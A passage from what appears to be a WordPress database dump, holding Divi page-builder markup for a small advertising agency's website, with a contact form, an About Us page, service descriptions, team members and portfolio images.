hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','inherit','closed','closed','','753-revision-v1','','','2020-08-18 10:56:22','2020-08-18 10:56:22','',753,'https://wthtest1.in8.cdn-alpha.com/753-revision-v1/',0,'revision','',0),(760,1,'2020-08-18 10:58:36','2020-08-18 10:58:36',' ','','','publish','closed','closed','','760','','','2020-08-18 10:58:36','2020-08-18 10:58:36','',0,'https://wthtest1.in8.cdn-alpha.com/?p=760',4,'nav_menu_item','',0);
INSERT INTO `wp_posts` VALUES (761,1,'2020-08-18 11:00:39','2020-08-18 11:00:39','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"4.5.6\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"50px|0px|50px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||56px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" 